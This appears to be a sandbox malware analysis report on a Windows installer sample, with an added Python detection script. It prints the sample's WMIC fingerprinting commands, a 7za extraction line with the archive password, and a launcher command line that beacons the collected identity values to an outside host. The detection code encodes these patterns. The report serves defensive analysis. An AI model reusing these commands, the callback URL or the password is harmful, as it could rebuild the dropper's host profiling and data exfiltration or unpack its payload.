Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64  arch:x86  image:win7-20240611-en  locale:en-us  os:windows7-x64  system
  • submitted
    16/06/2024, 12:48 UTC

General

  • Target

    b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe

  • Size

    406KB

  • MD5

    b396063e909ca4c992a06cdbc2df0cd3

  • SHA1

    258def0a71f12cadab512b9aade17446bced5373

  • SHA256

    be535447f6baedc894f1bbd938733394c8b5ea43c5184e8c1643175e3e78a35a

  • SHA512

    ea940af80aa6897ad54c20b8d55a6b25e7ca4b76fee0064eddb71c39ab287bc083c89598b08bb1e6819441a02994d1f8f805b52db89d9a72bed6250fbfb171f0

  • SSDEEP

    12288:/A0i50GM1/EsSaaizIqHJNQbO4tYGbeNiro6:/AfyGEj7IqHDvEiNX6

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC bios Get Version /FORMAT:textvaluelist.xsl
      2⤵
      PID:2708
    • C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
      2⤵
      PID:2756
    • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe
      7za.exe e -y -p"4b4e0a8e25264cabf48c2fb5a66f7511" [RANDOM_STRING].7z
      2⤵
      • Executes dropped EXE
      PID:2984
    • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe
      "C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe" /initurl http://sub.yorkshatb.com/init/b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        wmic bios get serialnumber, version
        3⤵
        PID:2948
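
The process tree above is a complete installer chain: four WMIC queries for machine-identity values (csproduct UUID and Name, BIOS SerialNumber and Version), extraction of a password-protected 7z with the dropped 7za.exe, and launch of the dropped setupcl.exe with an /initurl callback that carries the collected values. Two details of the captured setupcl.exe command line are worth checking for in logs: the /uuid and /csname values are "stance(s) Available." (the tail of WMIC's "No Instance(s) Available." message rather than a GUID), and /biosversion is "BOCHS - 1", a virtual-machine BIOS string. The Python below is an added example, not code from the Triage report or from the sample; it runs over process-creation events constructed from this process tree and reports parents that match the fingerprint-then-extract-then-beacon pattern, pulling out the archive password (which also opens the dropped [RANDOM_STRING].7z listed under Downloads), the beacon host, the VM marker and the malformed UUID. The minimum of two identity properties per parent, and every VM marker other than "bochs", are assumptions.

```python
"""Hunt for an installer that fingerprints the host via WMIC, unpacks a
password-protected 7z and beacons the values out.  Added example built from the
process tree in this report; the event list below is constructed, not captured."""
import re
from collections import defaultdict, namedtuple
from urllib.parse import urlparse

Event = namedtuple("Event", "pid ppid image cmdline")

TMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = "b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118"
SAMPLE_EXE = TMP + "\\" + SAMPLE + ".exe"
DROP_DIR = TMP + r"\nsd4BD1.tmp"
WMIC = r"C:\Windows\SysWOW64\Wbem\WMIC.exe"

# Constructed from the report's process tree: (pid, parent pid, image, command line).
EVENTS = [
    Event(1696, 0, SAMPLE_EXE, f'"{SAMPLE_EXE}"'),
    Event(2688, 1696, WMIC, "WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl"),
    Event(2656, 1696, WMIC, "WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl"),
    Event(2708, 1696, WMIC, "WMIC bios Get Version /FORMAT:textvaluelist.xsl"),
    Event(2756, 1696, WMIC, "WMIC csproduct Get Name /FORMAT:textvaluelist.xsl"),
    Event(2984, 1696, DROP_DIR + r"\7za.exe",
          '7za.exe e -y -p"4b4e0a8e25264cabf48c2fb5a66f7511" [RANDOM_STRING].7z'),
    Event(580, 1696, DROP_DIR + r"\setupcl.exe",
          f'"{DROP_DIR}\\setupcl.exe" /initurl http://sub.yorkshatb.com/init/{SAMPLE}/:uid:? '
          f'/affid "-" /id "0" /name " " /uniqid {SAMPLE} /uuid stance(s) Available. '
          "/biosserial /biosversion BOCHS - 1 /csname stance(s) Available."),
    Event(2948, 580, WMIC.lower(), "wmic bios get serialnumber, version"),
]

# "wmic <class> get <prop>[, <prop>]" for the two classes that expose machine identity.
WMIC_GET = re.compile(r"\bwmic(?:\.exe)?\s+(csproduct|bios)\s+get\s+([\w ,]+?)(?=\s+/|\s*$)", re.I)
FINGERPRINT_PROPS = {"uuid", "serialnumber", "version", "name"}
# Inline 7-Zip password: 7z/7za ... -p"secret" or -psecret.
SEVENZIP_PW = re.compile(r'\b7za?(?:\.exe)?\b.*?\s-p"?([^"\s]+)', re.I)
# A "/switch" token that starts the string or follows whitespace (so URL slashes are ignored).
SWITCH = re.compile(r"(?<!\S)/(\w+)")
GUID = re.compile(r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$", re.I)
# "bochs" is what this report captured; the other markers are assumed, not from the report.
VM_MARKERS = ("bochs", "vmware", "virtualbox", "qemu")


def fingerprint_props(cmdline):
    """Machine-identity properties a WMIC command line queries (lower-cased set)."""
    props = set()
    for _cls, fields in WMIC_GET.findall(cmdline):
        props.update(f.strip().lower() for f in fields.split(",") if f.strip().lower() in FINGERPRINT_PROPS)
    return props


def archive_password(cmdline):
    """Password given inline to 7za/7z, or None."""
    m = SEVENZIP_PW.search(cmdline)
    return m.group(1) if m else None


def parse_switches(cmdline):
    """Map /switch -> value for a Windows-style command line; quotes are stripped."""
    out, hits = {}, list(SWITCH.finditer(cmdline))
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(cmdline)
        out[m.group(1).lower()] = cmdline[m.end():end].strip().strip('"').strip()
    return out


def beacon_info(cmdline):
    """(host, switches) when the command line carries an /initurl callback, else None."""
    sw = parse_switches(cmdline)
    return (urlparse(sw["initurl"]).hostname, sw) if sw.get("initurl") else None


def vm_markers(switches):
    """VM strings present in the fingerprint values the sample sends to its server."""
    blob = " ".join(switches.get(k, "") for k in ("uuid", "biosserial", "biosversion", "csname")).lower()
    return sorted(m for m in VM_MARKERS if m in blob)


def find_chains(events, min_props=2):
    """Parents whose direct children query >= min_props identity values and also
    extract a password-protected archive or launch a child that beacons them out."""
    kids = defaultdict(list)
    for ev in events:
        kids[ev.ppid].append(ev)
    chains = []
    for parent in events:
        props, password, beacon = set(), None, None
        for child in kids[parent.pid]:
            props |= fingerprint_props(child.cmdline)
            password = password or archive_password(child.cmdline)
            beacon = beacon or beacon_info(child.cmdline)
        if len(props) >= min_props and (password or beacon):
            host, sw = beacon if beacon else (None, {})
            chains.append({
                "parent_pid": parent.pid, "parent_image": parent.image,
                "fingerprint_props": props, "archive_password": password,
                "beacon_host": host, "vm_markers": vm_markers(sw),
                # False here means the /uuid value is not a GUID (WMIC error text in this report).
                "uuid_is_guid": bool(GUID.match(sw.get("uuid", ""))),
            })
    return chains


if __name__ == "__main__":
    for chain in find_chains(EVENTS):
        print(chain)
```

The setupcl.exe process (PID 580) also spawns a WMIC query, but it is not reported on its own because nothing under it extracts an archive or beacons; only the top-level installer (PID 1696) satisfies all three parts of the pattern.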

Network

  • DNS  sub.yorkshatb.com  (process: setupcl.exe)
    Remote address: 8.8.8.8:53
    Request: sub.yorkshatb.com IN A
    Response: no results found (no A record returned)
  • 8.8.8.8:53  sub.yorkshatb.com  dns  setupcl.exe
    Sent 63 B / received 136 B, 1 request / 1 response

    DNS Request

    sub.yorkshatb.com

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\[RANDOM_STRING].7z
    Filesize  80KB
    MD5       030704fec8e09f22541695badb27552d
    SHA1      33dabb64be1a527e20819e516a1257ed3c10461f
    SHA256    284a9b6e90bd414133fb235c7ada9126790548eb6d1b32f43ceb78df6c6facd6
    SHA512    04977560a6f8fa1889e0c21afc1b7cfa802bfe221db0084cffabbd4dfffe14c31075cfa3d4618b6bffb6e625b3cb31680b9a2b9646cd1c5078a6405870bd44f6

  • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe
    Filesize  574KB
    MD5       42badc1d2f03a8b1e4875740d3d49336
    SHA1      cee178da1fb05f99af7a3547093122893bd1eb46
    SHA256    c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
    SHA512    6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

  • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\nsExec.dll
    Filesize  8KB
    MD5       b8be6632a7dc8136ff01338be40fe701
    SHA1      043fa16929b2af5ed5c1c59b4035a10cf765fb43
    SHA256    289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
    SHA512    403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

  • \Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe
    Filesize  193KB
    MD5       10bd2af1b07ec6bc9cd17ba512569e59
    SHA1      807e17ab1b98177e135d30941b45081960d1e866
    SHA256    9c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c
    SHA512    deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed

  • memory/1696-41-0x0000000000400000-0x0000000000437000-memory.dmp
    Filesize  220KB
